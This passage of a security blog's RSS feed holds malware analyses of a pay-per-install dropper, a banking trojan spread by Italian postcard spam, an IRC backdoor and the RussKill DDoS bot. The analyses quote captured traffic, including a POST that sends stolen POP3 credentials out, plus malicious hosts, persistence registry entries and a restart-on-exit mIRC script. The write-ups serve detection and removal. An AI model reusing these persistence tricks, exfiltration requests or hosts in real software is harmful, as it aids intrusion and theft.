HKCU\current\software\Microsoft\Windows\CurrentVersion\Run\Aruluya:
rundll32.exe &quot;C:\WINDOWS\riap60.dll&quot;,Startup
HKCU\current\software\Microsoft\Windows\CurrentVersion\Run\iriuusum:
C:\Documents and Settings\Administrator\Local Settings\Application Data\kbwcodnrj\pumdfehtssd.exe
&nbsp;
Registry Modifications:
&nbsp;
HKLM\system\CurrentControlSet\Services\1519672323\Type = 01000000
HKCU\current\software\Microsoft\Internet Explorer\Toolbar\Locked = 01000000
HKCU\current\software\appdatalow\software\{97db103a-ec69-12c0-8972-4b581bd21e32}\aff_id = voguecash
&nbsp;
Internet Connections: 
&nbsp;
C:\Documents and Settings\Administrator\Desktop\your_exe.exe Connects to &quot;195.2.252.153&quot; on port 80 (TCP - HTTP).
C:\Documents and Settings\Administrator\Desktop\your_exe.exe Connects to &quot;195.2.252.157&quot; on port 80 (TCP - HTTP).
C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to &quot;72.55.140.184&quot; on port 80 (TCP - HTTP).
C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to &quot;72.55.174.185&quot; on port 80 (TCP - HTTP).
C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to &quot;77.245.58.4&quot; on port 80 (TCP - HTTP).
C:\Documents and Settings\Administrator\Local Settings\Temp\RarSFX0\vocd610.exe Connects to &quot;208.43.86.21&quot; on port 80 (TCP - HTTP).
C:\Documents and Settings\Administrator\Local Settings\Temp\wfpk.exe Connects to &quot;64.191.38.165&quot; on port 80 (TCP - HTTP).
&nbsp;
Modifed files in Network Shares:
&nbsp;
\\127.0.0.1\admin$\system32\drivers\aec.sys
\\127.0.0.1\admin$\system32\drivers\asyncmac.sys
\\127.0.0.1\admin$\system32\drivers\Cdaudio.sys
\\127.0.0.1\admin$\system32\drivers\dmusic.sys
\\127.0.0.1\admin$\system32\drivers\drmkaud.sys
\\127.0.0.1\admin$\system32\drivers\imapi.sys
\\127.0.0.1\admin$\system32\drivers\ip6fw.sys
\\127.0.0.1\admin$\system32\drivers\ipfltdrv.sys
\\127.0.0.1\admin$\system32\drivers\ipinip.sys
\\127.0.0.1\admin$\system32\drivers\irenum.sys
\\127.0.0.1\admin$\system32\drivers\kmixer.sys
\\127.0.0.1\admin$\system32\drivers\Modem.sys
\\127.0.0.1\admin$\system32\drivers\mskssrv.sys
\\127.0.0.1\admin$\system32\drivers\mspclock.sys
\\127.0.0.1\admin$\system32\drivers\mspqm.sys
\\127.0.0.1\admin$\system32\drivers\nwlnkflt.sys
\\127.0.0.1\admin$\system32\drivers\nwlnkfwd.sys
\\127.0.0.1\admin$\system32\drivers\RDPWD.sys
\\127.0.0.1\admin$\system32\drivers\redbook.sys
\\127.0.0.1\admin$\system32\drivers\secdrv.sys
\\127.0.0.1\admin$\system32\drivers\Serial.sys
\\127.0.0.1\admin$\system32\drivers\Sfloppy.sys
\\127.0.0.1\admin$\system32\drivers\splitter.sys
\\127.0.0.1\admin$\system32\drivers\swmidi.sys
\\127.0.0.1\admin$\system32\drivers\TDPIPE.sys
\\127.0.0.1\admin$\system32\drivers\TDTCP.sys
\\127.0.0.1\admin$\system32\drivers\usbstor.sys
&nbsp;
DNS Queries:
&nbsp;
0002136011.249576ca.01 1EBF1D3D088D4E50AF2030A3A7E30896.n.empty.19.empty.5_1._t_i.ffffffff.your_exe_exe.154.rc2.a4h9uploading.com
aebankonline.com
agrofee.com
bgroundplatt.com
cnfg.kusochtak.com
cnfg.net-secured-app.com
sts.think-adz.com
vc0.voguecash.net
vc1.voguecash.net
www.deewoo.net</pre></td></tr></table></div>

<p>The executable is currently able to download up to 11 files, so after executing it you and your PC are in serious danger.</p>
<p>&nbsp;</p>
<p>To be continued&#8230;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/06/pay-per-install/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Spam emails Cartoline.exe spread Spy.Banker Trojan</title>
		<link>http://blog.novirusthanks.org/2010/05/spam-emails-cartoline-exe-spread-spy-banker-trojan/</link>
		<comments>http://blog.novirusthanks.org/2010/05/spam-emails-cartoline-exe-spread-spy-banker-trojan/#comments</comments>
		<pubDate>Sun, 16 May 2010 20:40:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[banker]]></category>
		<category><![CDATA[cartoline.exe]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2613</guid>
		<description><![CDATA[In recent days we have registered a new wave of spam messages with subject as &#8220;Cartoline&#8221; that looked like to come from virgilio.it, and that contained a link that appeared to redirects the user to legitimate sites such as cards.virgilio.it. After analyzing the HTML in the message, we noticed that the link could redirect to [...]]]></description>
			<content:encoded><![CDATA[<p>In recent days we have registered a new wave of spam messages with the subject &#8220;Cartoline&#8221; that appeared to come from virgilio.it and contained a link that seemed to redirect the user to legitimate sites such as cards.virgilio.it. After analyzing the HTML of the message, we noticed that the link could redirect to a malicious web site that had <b>nothing to do</b> with virgilio.it. After clicking the malicious link, a box was presented to download a file named cartoline.exe:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/cartoline-spam-loader.gif" title="" alt="Screenshot" /></p>
<p>&nbsp;</p>
<p>The mere fact that an email message promoting postcards redirects the user to download an executable file is <b>very suspicious</b>, and in fact the file is infected with malware:</p>
<blockquote><p>
File name:	<b>cartoline.exe</b><br />
File size:	601600 bytes<br />
MD5 hash:	92a9346604726a7d26a51d3509f806e4<br />
SHA1 hash:	8d6817f4d365419b1cd2ac07c8035798d94d0d6e<br />
Detection rate:	 <font color="red">9</font> on 20 (<font color="red">45%</font>)<br />
Status:	<font color="red">INFECTED</font></p>
<p>a-squared	15/05/2010	5.0.0.7	<font color="red">Trojan-Downloader.Win32.Banload!IK</font><br />
AVG	271.1.1/2877	9.0.0.725	<font color="red">Downloader.Agent2.WWA</font><br />
Avira AntiVir	7.10.7.111	7.6.0.59	<font color="red">TR/Spy.Banker.Gen</font><br />
Comodo	3468	3.13.579	<font color="red">Heur.Pck.Enigma</font><br />
F-PROT6	20100515	4.5.1.85	<font color="red">W32/Heuristic-DL1!Eldorado</font><br />
G-Data	21.171	2.0.7309.847	<font color="red">Trojan-Downloader.Win32.Agent.dqkq A</font><br />
Ikarus T3	16/05/2010	1.1.84.0	<font color="red">Trojan-Downloader.Win32.Banload</font><br />
Kaspersky	16/05/2010	9.0.0.736	<font color="red">Trojan-Downloader.Win32.Agent.dqkq</font><br />
TrendMicro	171	9.120-1004	<font color="red">Mal_Banker</font>
</p></blockquote>
<p>Here we can see the activity of the malware by analyzing the log file generated by <a href="http://www.novirusthanks.org/products/hijack-hunter/" target="_blank">Hijack Hunter</a>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">[+] Running processes
&nbsp;
C:\windows\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603)
&nbsp;
[+] Registry startups
&nbsp;
Value: Win32
Data: C:\windows\wain.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
&nbsp;
[+] Files created/modified 15 days ago
&nbsp;
C:\WINDOWS\nvsvs.exe (1033216 bytes) (Unknown) (5/14/2010 7:53:34 PM) (--A-) (613feb50b850e0695c47b81a383caf28) (Created)
C:\WINDOWS\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603) (Created)
C:\WINDOWS\wilps.exe (806400 bytes) (Unknown) (5/14/2010 7:55:16 PM) (--A-) (9e78023032221f2955e95d7394531245) (Created)</pre></td></tr></table></div>

<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/cartoline-spam-dropped-files.gif" title="" alt="Screenshot" /></p>
<p>&nbsp;</p>
<p>Network traffic:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">POST /images/wab.php HTTP/1.0
Host: indiegear(dot)org
User-Agent: Mozilla/3.0 (compatible; Indy Library)
----------051410195548264
Content-Disposition: form-data; name=&quot;texto&quot;
POP3(Identi):Pass(........L.......); 
-----------------------------
----------051410195548264--</pre></td></tr></table></div>

<p>From the traffic above we can see that the malware is a password stealer: it sent data related to a POP3 account to the malicious host through the POST request to /images/wab.php.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">GET /images/heade.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: junipero(dot)com(dot)br
&nbsp;
GET /IT/contador.php HTTP/1.1
Host: www.richardmata(dot)xpg(dot)com(dot)br</pre></td></tr></table></div>

<p>From the last GET query, we can see this:</p>
<blockquote><p>
Estamos com 372 visitas
</p></blockquote>
<p>This is presumably the total number of users who clicked the malicious link in the email and were infected by the malware.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">GET /midia/list.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: mariogesteiracosta(dot)com(dot)br</pre></td></tr></table></div>

<p>As always, pay attention when reading email, even if you think the sender address may be legitimate. Remember never to click unknown links, and always analyze the HTML code of the email to better understand where the link may redirect.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/05/spam-emails-cartoline-exe-spread-spy-banker-trojan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>C&#8217;e&#8217; una Cartolina per te! = Backdoor.IRC.Zapchast</title>
		<link>http://blog.novirusthanks.org/2010/03/ce-una-cartolina-per-te-backdoor-irc-zapchast/</link>
		<comments>http://blog.novirusthanks.org/2010/03/ce-una-cartolina-per-te-backdoor-irc-zapchast/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 23:52:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[BuonaPasqua.gif.exe]]></category>
		<category><![CDATA[ircbot]]></category>
		<category><![CDATA[zapchast]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2587</guid>
		<description><![CDATA[We have noticed new waves of spam messages, this time in Italian language only, that promote the message &#8220;Happy Easter&#8221; and contain malicious links that redirect the users to download a file named BuonaPasqua.gif.exe, detected as Backdoor.IRC.Zapchast and it looks like to be an ircbot. &#160; &#160; Email headers: Sender: Cartoline.Net Subject: C&#8217;e&#8217; una Cartolina [...]]]></description>
			<content:encoded><![CDATA[<p>We have noticed new waves of spam messages, this time in Italian only, that carry the message &#8220;Happy Easter&#8221; and contain malicious links that redirect users to download a file named <a href="http://scanner.novirusthanks.org/analysis/3c5fbf3a129d7f9f7e9bf16abbef8a1b/QnVvbmFQYXNxdWEuZ2lmLmV4ZQ==/" title="Scanner Report" target="_blank">BuonaPasqua.gif.exe</a>, detected as Backdoor.IRC.Zapchast and apparently an IRC bot.</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-01.gif" title="Malicious Email" alt="Screenshot" width="530" /></p>
<p>&nbsp;</p>
<p>Email headers:</p>
<blockquote><p>
Sender: Cartoline.Net<br />
Subject: C&#8217;e&#8217; una Cartolina per te!<br />
Received: from naut2004.kultunaut.dk (1903ds1-by.1.fullrate.dk)<br />
IP Address: 90.184.81.220
</p></blockquote>
<p>Malicious link present in the message:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">GET /~nikolai/BuonaPasqua.gif.exe HTTP/1.0
Host: 194.79.14.129
Pragma: no-cache
&nbsp;
HTTP/1.1 200 OK
Date: Fri, 19 Mar 2010 22:40:41 GMT</pre></td></tr></table></div>

<p>When the file is executed, it opens an image file named xmas.jpg:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-02.gif" title="Displayed Image" alt="Screenshot" width="530" /></p>
<p>&nbsp;</p>
<p>At the same time we notice that a program named spoolsv.exe is trying to connect to a remote server and we get an alert from the Windows Firewall:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-03.gif" title="Windows Firewall Alert" alt="Screenshot" /></p>
<p>&nbsp;</p>
<p>Network traffic:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Protocol          : TCP
Remote Address    : 200.174.131.226
Remote Port       : 6667
&nbsp;
NICK kijo
NOTICE AUTH :*** Looking up your hostname
NOTICE AUTH :*** Checking Ident
&nbsp;
USER henryett &quot;&quot; &quot;200.174.131.226&quot; :pingo
NOTICE AUTH :*** No ident response
&nbsp;
SILENCE +*!*@*
MODE kijo +iwx
NOTICE AUTH :*** Couldn't look up your hostname
PING :74643361
:my.server.name 451 kijo SILENCE :Register first.
:my.server.name 451 kijo MODE :Register first.
:my.server.name 001 kijo :Welcome to the Internet Relay Network icyg
:my.server.name 002 kijo :Your host is my.server.name, running version beware1.5.7
:my.server.name 003 kijo :This server was created Tue Jul 13 2004 at 20:36:17 GMT
:my.server.name 251 kijo :There are 1 users and 9 invisible on 1 servers
:my.server.name 252 kijo 1 :operator(s) online
:my.server.name 254 kijo 2 :channels formed
:my.server.name 255 kijo :I have 10 clients and 0 servers
:my.server.name NOTICE kijo :Highest connection count: 14 (14 clients)
:my.server.name 422 kijo :MOTD File is missing
&nbsp;
:kijo!~bijaikos@XXX.XXX.XXX.XXX JOIN :#bran
:my.server.name 353 kijo = #bran :kijo @Bran @sullyc @batmanv @bassemd @eviaq @daiseyx
:my.server.name 366 kijo #bran :End of /NAMES list.
&nbsp;
:Bran!~lonut@Bran.ro MODE #bran +o kijo 
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giova a
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giovy a</pre></td></tr></table></div>

<p>Details on oper &#8220;Bran&#8221;:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">WHOIS Bran
:my.server.name 311 kijo Bran ~lonut Bran.ro * :B
:my.server.name 319 kijo Bran :#bran
:my.server.name 312 kijo Bran my.server.name :I'm too lazy to edit ircd.conf
:my.server.name 313 kijo Bran :is an IRC Operator
:my.server.name 317 kijo Bran 622 1269018316 :seconds idle, signon time
:my.server.name 318 kijo Bran :End of /WHOIS list.
&nbsp;
WHOWAS Bran
:my.server.name 314 kijo Bran ~lonut bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 15:03:19 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 14:04:23 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 13:57:47 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 11:43:16 2010
:my.server.name 369 kijo Bran :End of WHOWAS</pre></td></tr></table></div>

<p>The file spoolsv.exe appears to be the executable of the legitimate application mIRC, but we notice something strange&#8230; why is there no icon in the tray? After checking the files we notice that the skids have replaced the file mirc.ico with an empty icon, so it becomes &#8220;invisible&#8221; in the tray:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-04.gif" title="Files" alt="Screenshot" /></p>
<p>&nbsp;</p>
<p>Now let&#8217;s open the hidden mIRC and see how it looks:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-05.gif" title="mIRC with white backgrounds" alt="Screenshot" width="530" /></p>
<p>&nbsp;</p>
<p>It is the legitimate version of mIRC, but slightly hijacked: all the chat backgrounds are white to hide the content. A simple change of the colors and here we go:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-06.gif" title="mIRC with black backgrounds" alt="Screenshot" width="530" /></p>
<p>&nbsp;</p>
<p>We can get useful info from the hidden files in the same folder as the hidden spoolsv.exe. From the file users.ini we can see the users allowed to chat with the hidden mIRC that is started on the infected user&#8217;s system:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-07.gif" title="Content of users.ini" alt="Screenshot" width="530" /></p>
<p>&nbsp;</p>
<p>We can also see two files: a.reg, used to add to the Windows registry the keys needed to start the hidden mIRC at every reboot of the system, and run.bat, used to run a.reg and start the hidden mIRC (spoolsv.exe):</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-08.gif" title="Content of run.bat and a.reg" alt="Screenshot" width="530" /></p>
<p>&nbsp;</p>
<p>All files created by the malicious file BuonaPasqua.gif.exe:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">C:\WINDOWS\Temp\spoolsv
C:\WINDOWS\Temp\spoolsv\a.reg
C:\WINDOWS\Temp\spoolsv\aliases.ini
C:\WINDOWS\Temp\spoolsv\control.ini
C:\WINDOWS\Temp\spoolsv\mirc.ico
C:\WINDOWS\Temp\spoolsv\mirc.ini
C:\WINDOWS\Temp\spoolsv\remote.ini
C:\WINDOWS\Temp\spoolsv\run.bat
C:\WINDOWS\Temp\spoolsv\servers.ini
C:\WINDOWS\Temp\spoolsv\spoolsv.exe
C:\WINDOWS\Temp\spoolsv\users.ini
C:\WINDOWS\Temp\spoolsv\s.mrc
C:\WINDOWS\Temp\spoolsv\com.mrc
C:\WINDOWS\Temp\spoolsv\xmas.jpg
C:\WINDOWS\Temp\spoolsv\logs
C:\WINDOWS\Temp\spoolsv\sounds
C:\WINDOWS\Temp\spoolsv\download</pre></td></tr></table></div>

<p>From the script file com.mrc we can also see a sort of &#8220;restart on exit&#8221; code that makes sure that when mIRC is closed, the process spoolsv.exe is started again:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">on *:exit: { /run $mircexe | halt }</pre></td></tr></table></div>

<p>To remove this kind of threat from an infected system we can use a simple script that we will execute with our free software <a href="http://www.novirusthanks.org/products/threat-killer/" target="_blank">Threat Killer</a>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">[DELETE FOLDERS RECURSIVE]
C:\WINDOWS\Temp\spoolsv\
[/END]</pre></td></tr></table></div>

<p>Output:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/ce-una-cartolina-per-te-09.gif" title="Threat Killer output" alt="Screenshot" width="530" /></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/03/ce-una-cartolina-per-te-backdoor-irc-zapchast/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A new DDoS bot named RussKill is in the wild</title>
		<link>http://blog.novirusthanks.org/2010/02/a-new-ddos-bot-named-russkill-is-in-the-wild/</link>
		<comments>http://blog.novirusthanks.org/2010/02/a-new-ddos-bot-named-russkill-is-in-the-wild/#comments</comments>
		<pubDate>Tue, 09 Feb 2010 23:22:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[bot]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[russkill]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2519</guid>
		<description><![CDATA[RussKill is another DDoS bot that is controlled by a web panel, where users can send commands to their bots and start to attack a specified website using two methods of DDoS: &#160; HTTP-Flood that generates threaded queries to the index page of the website and try to make the attacked web page inaccessible from [...]]]></description>
			<content:encoded><![CDATA[<p>RussKill is another DDoS bot that is controlled by a web panel, where users can send commands to their bots and start to attack a specified website using two methods of DDoS:</p>
<p>&nbsp;</p>
<p>HTTP-Flood, which generates threaded requests to the index page of the website and tries to make the attacked web page inaccessible to regular users, making the server return a &#8220;Network Timeout&#8221; error. This kind of attack can also crash the web server if the requests are not properly filtered by a firewall.</p>
<p>&nbsp;</p>
<p>SYN-Flood, which sends a series of SYN requests to the target system using spoofed IPs. When the target system tries to send the SYN-ACK message to the IP address that sent the SYN request, the spoofed IP cannot send back the ACK message and the target system keeps waiting for it.</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/russkill.gif" alt="Screenshot" title="Web panel of RussKill" width="530" /></p>
<p>&nbsp;</p>
<p>The features described by the author of RussKill are:</p>
<p>&nbsp;</p>
<p>- Bot is hidden from the user<br />
- Bot accepts HTTP or HTTPS<br />
- Bot protects its registry keys and values, making them hard to remove<br />
- User can select the type of attack and the number of threads to use<br />
- Powerful SYN-Flood<br />
- Bot can attack on a custom port, domain:port<br />
- User can select the connection delay for a bot to connect to the web panel<br />
- PHP and MySQL admin panel system</p>
<p>&nbsp;</p>
<p>The bot is sold with the admin panel for 300 USD and the author offers a rebuild for a new domain for 50 USD.</p>
<p>&nbsp;</p>
<p>We found a sample of the bot and Steve unpacked it (with VMUnpacker); the following interesting data was extracted:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">.aspack
.adata
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
TThreadLocalCounter
0.0.0.0
127.0.0.1
255.255.255.255
%d.%d.%d.%d
0.0.0.0
ws2_32.dll
wship6.dll
localhost
SF_Any
SF_IP4
SF_IP6
TSocksType
ST_Socks5
ST_Socks4
TSSLType
LT_all
LT_SSLv2
LT_SSLv3
LT_TLSv1
LT_TLSv1_1
LT_SSHv2
MaxLineLength(
MaxSendBandwidth(
MaxRecvBandwidth(
MaxBandwidth
InterPacketTimeout(
SendMaxChunk
StopFlag(
TSocksBlockSocket
OnCreateSocket
SocksIP
SocksPort
SocksUsername
SocksPassword
SocksTimeout
SocksResolver
SocksType
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
TCustomSSL
Synapse TCP/IP Socket error %d: %s
Proxy-Authorization: Basic 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
open
.exe
..w.i...n.f...d...d...
\memosssf.ini
\system32
\system32\
.exe
 /uninstall /silent
\System32\
\System32\lkdir.dll
\System32\lkdir
.dll
 /install /silent</pre></td></tr></table></div>

<p>From the above data we can see that the bot was compiled with Delphi, uses the Synapse TCP/IP component for connections and was packed with ASPack:</p>
<blockquote><p>
.aspack<br />
.adata
</p></blockquote>
<p>We can see the user agent the bot will use for the DDoS attacks:</p>
<blockquote><p>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
</p></blockquote>
<p>We can see a reference to system32\ and to a file named lkdir.dll. We can also see the file name that the bot will take when it is installed on the victim&#8217;s computer:</p>
<blockquote><p>
..w.i&#8230;n.f&#8230;d&#8230;d.. -> winfdd.exe
</p></blockquote>
<p>The bot also appears to support command line parameters:</p>
<blockquote><p>
 /install /silent
</p></blockquote>
<p>When the program is executed, it creates the following files:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">%User%\Local Settings\Application Data\microsoft\windows\wtnmm.exe
%User%\Local Settings\Application Data\microsoft\windows\winfdd.exe
%User%\Local Settings\Application Data\microsoft\windows\95548.exe
%User%\Start Menu\Programs\Startup\wtnmm.exe</pre></td></tr></table></div>

<p>The program creates the following entries in the registry:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
explorer.exe, &quot;%User%\Local Settings\Application Data\microsoft\windows\wtnmm.exe&quot;</pre></td></tr></table></div>

<p>The bot established connections with one main IP address on port 80, which we assume is the web panel of the bot:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">115.100.250.104 -&gt; akakalat.com</pre></td></tr></table></div>

<p>We can see from the following traffic that the bot received a list of URLs:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">GET /779/s.php HTTP/1.0
Host: akakalat.com
&nbsp;
[|250|60hxxp://www.cian(dot)ru/cat.php?type=2
hxxp://www.cian(dot)ru/cat.php?suburbian=yes&amp;deal_type=2&amp;object_type[1][|250|60hxxp://tvshowstock(dot)com
hxxp://dvdglee(dot)com/hot.php
hxxp://dvdorder3online(dot)com/products/MI5Spooks-Seasons-1-8-DVD-Boxset-DVDS-1934.htm]0|150|60hxxp://www.dvdcollects(dot)com/products/Lost-complete-Seasons-1-5-DVD-Boxset-DVDS-1664.html
hxxp://dvdsetshop16(dot)com/products/Farscape-Complete-Seasons-1-4-DVD-Boxset-DVDS-1466.html
hxxp://dvdcollects10(dot)com/List.aspx?CatID=13
hxxp://dvdsonyk(dot)com</pre></td></tr></table></div>

<p>After the bot received the above traffic, it generated a file named thumbcac_888.db which contains the links and the commands to execute:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">%User%\Local Settings\Application Data\microsoft\windows\thumbcac_888.db</pre></td></tr></table></div>

<p>The bot then started to visit all the links from the thumbcac_888.db file; one of the links contains obfuscated JavaScript that redirects the victim to another malicious link:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">/List.aspx?CatID=13&amp;&quot;+decoder();</pre></td></tr></table></div>

<p>Decoded:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">/List.aspx?CatID=13&amp;jdfwkey=b9ogg2</pre></td></tr></table></div>

<p>After more than 24 hours of running we noticed some Internet Explorer windows open that contained fake security scans and fake security warnings, a common symptom of rogue security software.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/02/a-new-ddos-bot-named-russkill-is-in-the-wild/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

